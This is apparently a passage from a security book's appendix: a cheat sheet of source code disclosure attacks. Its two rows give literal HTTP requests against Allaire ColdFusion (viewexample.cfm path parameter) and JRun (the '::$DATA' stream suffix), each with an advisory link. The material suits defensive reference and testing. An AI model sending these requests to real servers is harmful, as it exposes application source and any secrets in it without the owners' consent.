This appendix contains a list of all the major source code disclosure techniques discovered over the years. Many of them are specific to particular bugs in particular versions of software. Others are generic across platforms and have been known to reappear contrary to what the vendors say.
Table D-1. Source Code, File, and Directory Disclosure Cheat Sheet
|Vulnerable Application||HTTP Request||Vulnerability Information|
|Allaire ColdFusion||GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<relative path to CFM file> HTTP/1.0||http://www.securityfocus.com/bid/115|
|Allaire JRun Alternative Data Stream||GET /file.jsp::$DATA HTTP/1.0||http://www.securityfocus.com/bid/3664|